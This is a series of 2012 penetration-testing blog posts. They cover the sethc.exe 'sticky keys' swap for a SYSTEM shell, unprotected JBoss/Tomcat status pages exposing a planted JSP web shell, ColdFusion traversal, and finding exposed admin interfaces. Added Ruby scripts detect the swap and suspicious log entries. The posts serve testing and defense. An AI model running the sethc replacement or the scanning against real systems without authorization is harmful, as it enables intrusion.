Monday, April 30, 2012

Privilege Escalation via "Sticky" Keys


This has been documented all over, but I like things to be on the blog so I can find them...

You can gain a SYSTEM shell on a system you have administrative access to, or one you have physical access to where you can boot to a repair disk or a Linux distro and change files.

Make a copy of the original sethc.exe somewhere on the system (from Windows, or from a Linux boot disk with the Windows volume mounted at /mnt/sda3):

copy c:\windows\system32\sethc.exe c:\

or

cp /mnt/sda3/Windows/System32/sethc.exe /mnt/sda3/sethc.exe


Copy cmd.exe over sethc.exe:


copy /y c:\windows\system32\cmd.exe c:\windows\system32\sethc.exe


or


cp /mnt/sda3/Windows/System32/cmd.exe /mnt/sda3/Windows/System32/sethc.exe


Reboot, hit the Shift key 5 times, and a SYSTEM shell will pop up; do your thing.

It would probably be nice to put sethc.exe back when you are done.
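An added example from the defender's side (not code from the original post): a Ruby check that spots the swap described above, run either on the live box or against a Windows volume mounted from a boot disk. The System32 path is whatever you pass in, and the baseline hash is assumed to have been recorded before any change, e.g. from the backup copy the post suggests making.

```ruby
require 'digest'
require 'fileutils'
require 'tmpdir'

# Compute the SHA-256 of a file on disk.
def sha256(path)
  Digest::SHA256.file(path).hexdigest
end

# Check sethc.exe in a System32 directory (live, or a Windows volume mounted
# from a boot disk, e.g. /mnt/sda3/Windows/System32). Flags it if it is
# byte-identical to cmd.exe, or if it no longer matches a known-good baseline
# hash (pass nil when none has been recorded).
def check_sethc(system32_dir, baseline: nil)
  sethc = File.join(system32_dir, 'sethc.exe')
  cmd   = File.join(system32_dir, 'cmd.exe')
  return { status: :missing, findings: ['sethc.exe not found'] } unless File.file?(sethc)

  sethc_hash = sha256(sethc)
  findings = []
  findings << 'sethc.exe is byte-identical to cmd.exe' if File.file?(cmd) && sha256(cmd) == sethc_hash
  findings << 'sethc.exe does not match recorded baseline' if baseline && baseline != sethc_hash
  { status: findings.empty? ? :ok : :replaced, sha256: sethc_hash, findings: findings }
end

# Demo on a constructed directory with placeholder files (not real binaries):
# record a baseline, then overwrite sethc.exe with cmd.exe the way the post does
# and re-check. Returns the before and after results.
def demo
  Dir.mktmpdir do |dir|
    File.binwrite(File.join(dir, 'cmd.exe'),   'MZ placeholder cmd.exe')
    File.binwrite(File.join(dir, 'sethc.exe'), 'MZ placeholder sethc.exe')
    baseline = sha256(File.join(dir, 'sethc.exe'))
    before = check_sethc(dir, baseline: baseline)
    FileUtils.cp(File.join(dir, 'cmd.exe'), File.join(dir, 'sethc.exe'))
    after = check_sethc(dir, baseline: baseline)
    [before, after]
  end
end

if __FILE__ == $PROGRAM_NAME
  demo.each { |r| puts "#{r[:status]}: #{r[:findings].join('; ')}" }
end
```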
CG

Friday, April 27, 2012

From LOW to PWNED [3] JBoss/Tomcat server-status



Several (tm) months back I did my talk "From LOW to PWNED" at hashdays and BSides Atlanta.

The slides were published here and the video from hashdays is here; there is no video for BSides ATL.

I consistently violate presentation zen and try to make my slides usable after the talk, but I decided to do a few blog posts covering the topics from the talk anyway.

Post [3] JBoss/Tomcat server-status

There have been some posts/exploits/modules on hitting up unprotected JBoss and Tomcat servers:

http://www.nruns.com/_downloads/Whitepaper-Hacking-jBoss-using-a-Browser.pdf
http://carnal0wnage.attackresearch.com/2009/11/hacking-unprotected-jboss-jmx-console.html
http://www.notsosecure.com/folder2/2009/10/27/hacking-jboss-with-jmx-console/
http://goohackle.com/jboss-security-vulnerability-jmx-management-console/

http://www.metasploit.com/modules/exploit/multi/http/jboss_maindeployer
http://www.metasploit.com/modules/exploit/multi/http/tomcat_mgr_deploy

Sometimes, even though the deployer functionality is password protected, the server-status page may not be:

/web-console/status?full=true



/manager/status/all



LOW?

This can be useful to find:


  • Lists of applications
  • Recent URLs accessed
    • sometimes with session IDs
  • Hidden services/apps
  • Enabled servlets
  • 0wned stuff :-)
Finding 0wned stuff is always fun, so let's see.

Looking at the list of applications, there is one that doesn't look normal (zecmd).

Following that down leads us to zecmd.jsp, which is a JSP shell.


If you are interested in zecmd.jsp and the JBoss worm it comes from, this is a good write-up, as is this OWASP presentation: https://www.owasp.org/images/a/a9/OWASP3011_Luca.pdf
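As an added example (not code from the original post), here is a Ruby pass over Tomcat access-log lines that flags, from the defender's side, the two things this post is about: hits on the status pages from outside an admin network, and JSP requests for contexts that are not in your deployment inventory (the zecmd case). The log lines, the 10.0.0.0/8 admin range and the inventory are constructed assumptions.

```ruby
require 'ipaddr'

# Constructed sample Tomcat access-log lines (common log format), not real traffic.
SAMPLE_LOG = <<~LOG
  10.0.0.5 - - [27/Apr/2012:10:00:01 -0400] "GET /manager/status/all HTTP/1.1" 200 5120
  198.51.100.7 - - [27/Apr/2012:10:00:09 -0400] "GET /web-console/status?full=true HTTP/1.1" 200 9800
  198.51.100.7 - - [27/Apr/2012:10:00:15 -0400] "GET /zecmd/zecmd.jsp HTTP/1.1" 200 310
  10.0.0.5 - - [27/Apr/2012:10:01:00 -0400] "GET /shop/index.jsp HTTP/1.1" 200 2200
LOG

LINE_RE = /\A(?<ip>\S+) \S+ \S+ \[[^\]]+\] "(?<method>\S+) (?<path>\S+) [^"]*" (?<status>\d{3})/
# The two status pages from the post; they should only ever be reached from admin networks.
STATUS_PATHS = %r{\A/(manager/status|web-console/status)}

# Walk the log and return one finding per suspicious request:
#  - a status page request from an IP outside the admin networks (CIDR strings)
#  - a .jsp request whose top-level context is not in the deployed-app inventory
def analyze(log, deployed:, admin_nets:)
  nets = admin_nets.map { |n| IPAddr.new(n) }
  findings = []
  log.each_line do |line|
    m = LINE_RE.match(line)
    next unless m
    path = m[:path].split('?').first        # drop the query string
    ip = IPAddr.new(m[:ip])
    context = path.split('/')[1]            # "/shop/index.jsp" -> "shop"
    if path.match?(STATUS_PATHS) && nets.none? { |n| n.include?(ip) }
      findings << { ip: m[:ip], path: path, reason: :status_page_from_outside }
    elsif path.end_with?('.jsp') && !deployed.include?(context)
      findings << { ip: m[:ip], path: path, reason: :jsp_outside_inventory }
    end
  end
  findings
end

# Run the check over the constructed sample with an assumed inventory and admin range.
def demo
  analyze(SAMPLE_LOG, deployed: %w[manager web-console shop], admin_nets: ['10.0.0.0/8'])
end

demo.each { |f| puts "#{f[:reason]}: #{f[:ip]} #{f[:path]}" } if __FILE__ == $PROGRAM_NAME
```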

thoughts?

-CG


CG

Monday, April 23, 2012

From LOW to PWNED [2] ColdFusion




Post [2] ColdFusion

Whhhhaaaat? ColdFusion?
  • Originally released in 1995 by Allaire
  • Motivation: make it easier to connect simple HTML pages to a database
  • Along the way became full Java
  • Latest version is ColdFusion 9 released in 2009
  • Most recent features focus on integration with other technologies, e.g. Flash, Flex, AIR, Exchange, MS Office, etc.
  • Common to see CF 7 - 9 on the web
  • Open source CFML is available as well
    • BlueDragon, Railo, Mura CMS
Background Reading:

http://carnal0wnage.attackresearch.com/2011/12/not-0wning-that-coldfusion-server-but.html
http://averagesecurityguy.info/2011/12/09/owning-a-coldfusion-server/
https://media.blackhat.com/bh-us-10/presentations/Eng_Creighton/BlackHat-USA-2010-Eng-Creighton-Deconstructing-ColdFusion-slides.pdf
https://media.blackhat.com/bh-us-10/whitepapers/Eng_Creighton/BlackHat-USA-2010-Eng-Creighton-Deconstructing-ColdFusion-wp.pdf
http://www.orkspace.net/secdocs/Conferences/EuSecWest/2006/ColdFusion%20Security.pdf

LOW?


Two nice bugs exist that I don't think vuln scanners commonly check for.


Locale traversal CVE: 2010-2861
coldfusion_locale_traversal.rb

Great overview/walkthrough here: http://www.gnucitizen.org/blog/coldfusion-directory-traversal-faq-cve-2010-2861/
Vulnerable versions:
ColdFusion MX6 6.1 base patches
ColdFusion MX7 7,0,0,91690 base patches
ColdFusion MX8 8,0,1,195765 base patches
ColdFusion MX8 8,0,1,195765 with Hotfix4
ColdFusion 9? Immunity reported yes, but Adobe fixed the downloadable version of 9, so maaaaaaybe, if it is an old version of 9.

*No patches exist for 6 & 7, so if you see CF6 or CF7 it is always vulnerable to the bug.*



There's lots more to the ColdFusion story, enough that I recently gave a talk on it.
CG

Friday, April 20, 2012

From LOW to PWNED [1] Exposed Services and Admin Interfaces




Post [1] Exposed Services and Admin Interfaces

Exposed Services:

An example of exposed services, and of making sure you check for default and common passwords. The first example is a VNC server with no password. This gives us a HIGH severity finding.

The following is a VNC server with a password of "password":

See the problem? The same thing goes for SSH, Telnet, FTP, etc. Don't forget about databases as well: MS SQL, MySQL, Oracle, Postgres listening out to the Internet at large.



Admin Interfaces:

Admin interfaces can be gold. The problem is 1) you have to find them on the random ass port they are running on and 2) you have to get eyes on them. This can be a hassle/problem/hard to do.

So, to bring the "low" to it: some random HTTP server gets you this in Nessus.

Now, to be fair, this could be totally accurate, but the point is you need to look at what is being served on this HTTP server. Could be something, could be nothing; no way to know unless you look. Finding useful HTTP pages on all the random ports can be challenging.

Here is a possible methodology for doing it:


  1. Nmap your range
  2. Import your nmap results into metasploit
  3. Use the db_ searches to pull out a list of hosts & ports
  4. With the magic of scripting languages make that list into an html page(s)
  5. Use linky to open all those links
Kinda goes like this:

After you have imported your nmap results, use the services option.

If it's populated you'll get a list of results like the below.

Output that stuff to a CSV:

msf > services -o /tmp/demo.csv

Take that CSV and run some Ruby on it.
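An added example, not the post's own script: a Ruby script that turns the CSV from `services -o` into an HTML page of links for linky. It assumes the CSV columns are host,port,proto,name,state,info (the sample rows are constructed) and builds links only for open TCP services that nmap named as some flavour of http or that sit on common web ports.

```ruby
require 'csv'
require 'cgi'

# Constructed sample of what `services -o` writes; columns assumed to be
# host,port,proto,name,state,info. Hosts are documentation addresses, not real.
SAMPLE_CSV = <<~CSV
  host,port,proto,name,state,info
  192.0.2.10,80,tcp,http,open,Apache httpd 2.2.3
  192.0.2.10,8443,tcp,ssl/http,open,Apache Tomcat
  192.0.2.11,22,tcp,ssh,open,OpenSSH 5.3
  192.0.2.12,8080,tcp,http-proxy,open,
  192.0.2.13,161,udp,snmp,open,
CSV

# Ports we try over TLS even when nmap did not label the service ssl/.
TLS_PORTS = [443, 8443].freeze
# Ports worth a look even when nmap could not name the service.
WEB_PORTS = [80, 443, 8000, 8080, 8443, 8888].freeze

# Return a URL for a services row if it looks like a web service, else nil.
def web_url(row)
  return nil unless row['state'] == 'open' && row['proto'] == 'tcp'
  name = row['name'].to_s
  port = row['port'].to_i
  return nil unless name.include?('http') || WEB_PORTS.include?(port)
  tls = name.start_with?('ssl/') || name == 'https' || TLS_PORTS.include?(port)
  "#{tls ? 'https' : 'http'}://#{row['host']}:#{port}/"
end

# Parse the CSV text and collect the unique URLs in file order.
def services_to_links(csv_text)
  CSV.parse(csv_text, headers: true).map { |row| web_url(row) }.compact.uniq
end

# Render the URLs as an HTML list; linky opens every link on the page in a new tab.
def links_to_html(links)
  items = links.map { |u| "<li><a href=\"#{CGI.escapeHTML(u)}\">#{CGI.escapeHTML(u)}</a></li>" }
  "<html><body><ul>\n#{items.join("\n")}\n</ul></body></html>\n"
end

if __FILE__ == $PROGRAM_NAME
  csv_text = ARGV[0] ? File.read(ARGV[0]) : SAMPLE_CSV   # e.g. /tmp/demo.csv from msf
  File.write('links.html', links_to_html(services_to_links(csv_text)))
end
```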


The above code will output an HTML file that you can open with linky.
linky will open each link in a new tab, giving you a way to get eyes on each of those random HTTP(S) services.

You can now start intelligently trying default passwords or viewing exposed content.

Thoughts?

-CG

CG

Thursday, April 19, 2012

From LOW to PWNED [0] Intro



Post [0] Intro/The point of the talk (sorry no pics of msf or courier new font in this one):

I had several points (I think...maybe all the same point...whatever)

1.  We tend to have an over-reliance on vulnerability scanners to tell us everything that is vulnerable.  To be honest, I have been guilty of this myself.  Most of us probably have, for a variety of reasons: time, experience, level of effort required/paid for, etc.  This over-reliance on scanners has led to "no highs" == "secure environment".  Most of us know this is not *always* the case, and the point of the talk was to show some examples where medium and low vulnerabilities have led to further exploitation or impact that I would consider "high" or above. Whether you call them chained exploits, magic, or the natural evolution of taking multiple smaller vulnerabilities and turning them into a significant exploit or opportunity, it's becoming more normal/common to have to go this route.

2. Given the "no highs" == "secure environment" mentality some clients have been conditioned that anything that is not a high is not exploitable and therefore not a priority for fixing (sometimes ever).  This of course is not the outcome most people would recommend. Nevertheless some people take that approach.

3. How many IDS/IPS signatures exist for low and medium vulns and how often do we ignore/disable those? Feedback welcome here.

4. Clients should pay attention to low/medium vulns as much as they do high+ vulns, and in turn pentesters/VA people/security teams should also pay attention to low/medium vulns. Does that mean every SSLv2-enabled service should be a full-out emergency? Hell no, but *someone* needs to be able to vet that those low/medium findings can't be turned into something more.

5. Keep a human in the mix.  Tools/scanners are great for automating tasks, but I don't think we are there yet with the technology of taking multiple less severe vulnerabilities and turning them into something significant. Bottom line: the scanner won't find all your ownable stuff; you need a person (or people) to do this.


Thoughts?

-CG





CG

Wednesday, April 11, 2012

ColdFusion for Pentesters at SOURCE Boston


I'll be giving my ColdFusion for Pentesters talk at SOURCE Boston next week.

Here is the info from the abstract:

"ColdFusion is one of those technologies where organizations are either ColdFusion shops or they won't touch it on a bet. Similarly, I find that pentesters have either been exposed to it and have a few tricks to attack it or not. Aside from common web application issues, ColdFusion can also be attacked on the network level and many times used to obtain remote access on the host. This talk will cover what is ColdFusion, common ColdFusion issues, finding useful ColdFusion URLs, identifying specific ColdFusion version and components, and verifying if common vulnerabilities are present in the ColdFusion server you are targeting. If access to the ColdFusion administrative interface can be obtained, you can perform post exploitation activities that will typically yield you remote access to the operating system supporting the ColdFusion install."


Like the other talks, I'll do the what it is, why you care (?), and some ways to go after it.  Hopefully useful/interesting.

Hope to see people there.

-CG

CG